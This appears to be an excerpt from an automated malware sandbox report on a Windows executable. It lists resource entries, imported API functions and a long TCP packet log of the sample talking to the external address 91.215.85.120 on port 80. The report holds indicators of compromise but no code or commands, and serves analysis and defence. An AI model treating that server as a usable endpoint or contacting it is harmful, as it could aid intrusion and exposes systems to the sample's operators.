                                                                                                                                                                    RT_STRING0x518b80x356dataSetsuanaSouth Africa0.48009367681498827
                                                                                                                                                                    RT_STRING0x51c100x1a8dataSetsuanaSouth Africa0.5117924528301887
                                                                                                                                                                    RT_ACCELERATOR0x4e1b00x30dataSetsuanaSouth Africa0.9583333333333334
                                                                                                                                                                    RT_GROUP_CURSOR0x4e3180x14Lotus unknown worksheet or configuration, revision 0x1SetsuanaSouth Africa1.3
                                                                                                                                                                    RT_GROUP_ICON0x3b9a80x14dataSetsuanaSouth Africa1.1
                                                                                                                                                                    RT_GROUP_ICON0x421800x76dataSetsuanaSouth Africa0.6694915254237288
                                                                                                                                                                    RT_GROUP_ICON0x479100x68dataSetsuanaSouth Africa0.7019230769230769
                                                                                                                                                                    RT_GROUP_ICON0x4e1380x76dataSetsuanaSouth Africa0.6694915254237288
                                                                                                                                                                    RT_VERSION0x4e3300x1dcdataSetsuanaSouth Africa0.5903361344537815
                                                                                                                                                                    DLLImport
                                                                                                                                                                    KERNEL32.dllHeapFree, FreeEnvironmentStringsA, GetModuleHandleW, TlsSetValue, GlobalAlloc, IsProcessInJob, WriteConsoleOutputA, SetConsoleCP, LeaveCriticalSection, DnsHostnameToComputerNameW, SetMessageWaitingIndicator, SetTimeZoneInformation, GetCompressedFileSizeA, CompareStringW, SetCurrentDirectoryA, GetLastError, CreateJobObjectW, CreateNamedPipeA, EnumDateFormatsExA, OpenWaitableTimerA, LoadLibraryA, SetConsoleOutputCP, VirtualLock, AddAtomA, CreateWaitableTimerW, VirtualProtect, QueryPerformanceFrequency, LocalFree, SetFileAttributesW, LCMapStringW, CompareStringA, GetTimeZoneInformation, FreeLibrary, CopyFileExW, GetLongPathNameA, TryEnterCriticalSection, GetStartupInfoW, RaiseException, RtlUnwind, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, HeapCreate, HeapDestroy, VirtualFree, DeleteCriticalSection, FatalAppExitA, EnterCriticalSection, VirtualAlloc, HeapReAlloc, Sleep, GetProcAddress, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, TlsGetValue, TlsAlloc, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, GetCurrentThread, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, HeapSize, SetConsoleCtrlHandler, InterlockedExchange, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, GetLocaleInfoW, GetLocaleInfoA, WideCharToMultiByte, GetTimeFormatA, GetDateFormatA, GetUserDefaultLCID, EnumSystemLocalesA, IsValidLocale, GetStringTypeA, MultiByteToWideChar, GetStringTypeW, LCMapStringA, SetEnvironmentVariableA
                                                                                                                                                                    USER32.dllGetProcessDefaultLayout
                                                                                                                                                                    ADVAPI32.dllAbortSystemShutdownA, EqualSid, ReadEventLogW
                                                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                    SetsuanaSouth Africa
                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                    Jan 7, 2024 05:29:18.296498060 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:18.490669012 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:18.490746975 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:18.492352009 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:18.492508888 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:18.686784983 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:18.687048912 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:18.704577923 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:18.709256887 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:18.709294081 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:18.907115936 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:18.925646067 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:18.925741911 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:18.925801992 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:18.925856113 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:18.925879002 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:18.925924063 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:18.925928116 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:18.926013947 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:18.926050901 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:18.926093102 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:18.926203966 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:18.926244020 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:18.926275969 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:18.926338911 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:18.926376104 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.119956970 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.120009899 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.120094061 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.120202065 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.120313883 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.120426893 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.120594025 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.120734930 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.120779037 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.120791912 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.120819092 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.120902061 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.120946884 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.120965004 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.121002913 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.121036053 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.121167898 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.121232986 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.121290922 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.121316910 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.121371031 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.121381044 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.121450901 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.121630907 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.121689081 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.121720076 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.121779919 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.121798992 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.121812105 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.121853113 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.314799070 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.314857006 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.314919949 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.314937115 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.314987898 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.315033913 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.315479040 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.315565109 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.315620899 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.315664053 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.315675020 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.315709114 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.315777063 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.315951109 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.316035986 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.316075087 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.316147089 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.316190958 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.316205025 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.316263914 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.316298008 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.316339970 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.316368103 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.316411018 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.316467047 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.316556931 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.316615105 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.316656113 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.316656113 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.316698074 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.316711903 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.316812038 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.316881895 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.316895008 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.316920042 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.316950083 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.316989899 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.317030907 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.317073107 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.317085028 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.317230940 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.317322969 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.317365885 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.317385912 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.317409992 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.317419052 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.317480087 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.317537069 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.317575932 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.317579031 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.317617893 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.317650080 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.317734003 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.317783117 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.317823887 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.317826033 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.317858934 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.317902088 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.317975044 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.319488049 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.508637905 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.508655071 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.508688927 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.508713007 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.508827925 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.508872986 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.508912086 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.508982897 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.509016991 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.509049892 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.509157896 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.509205103 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.509274006 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.509322882 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.509366989 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.509422064 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.509556055 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.509644032 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.509696007 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.509744883 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.509799004 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.509839058 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.509875059 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.509910107 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.509938955 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.510019064 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.510065079 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.510082960 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.510134935 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.510188103 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.510236025 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.510262966 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.510338068 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.510385036 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.510435104 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.510492086 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.510512114 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.510561943 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.510602951 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.510663033 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.510725975 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.510788918 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.510819912 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.510890007 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.510940075 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.510963917 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.511017084 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.511157990 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.511159897 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.511225939 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.511291027 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.511334896 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.511395931 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.511451960 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.511461973 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.511498928 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.511574030 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.511595964 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.511643887 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.511734009 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.511748075 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.511779070 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.511821032 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.511823893 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.511864901 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.511904955 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.511933088 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.512001991 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.512022972 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.512069941 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.512094975 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.512136936 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.512207985 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.512268066 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.512327909 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.512335062 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.512392044 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.512480021 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.512521982 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.512566090 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.512593985 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.512628078 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.512639046 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.512674093 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.512701035 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.512738943 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.512789965 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.512818098 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.512900114 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.512960911 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.513025045 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.513092041 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.513142109 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.513299942 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.513382912 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.513439894 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.513478994 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.513489008 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.513524055 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.513528109 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.513593912 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.513638973 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.513657093 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.513711929 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.513756037 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.513765097 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.513813972 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.513881922 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.513885021 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.513935089 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.514007092 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.514008045 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.514055014 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.514169931 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.514210939 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.514302015 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.514318943 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.514342070 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.514343977 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.514385939 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.703335047 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.703351021 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.703362942 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.703418970 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.703521013 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.703571081 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.703633070 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.703654051 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.703691006 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.703722000 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.703790903 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.703845024 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.704040051 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.704133034 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.704205990 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.704247952 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.704292059 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.704329014 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.704374075 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.704443932 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.704457045 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.704497099 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.704504013 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.704538107 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.704541922 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.704634905 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.704670906 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.704711914 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.704793930 CET804973591.215.85.120192.168.2.4
                                                                                                                                                                    Jan 7, 2024 05:29:19.704832077 CET4973580192.168.2.491.215.85.120
                                                                                                                                                                    Jan 7, 2024 05:29:19.704860926 CET804973591.215.85.120192.168.2.4
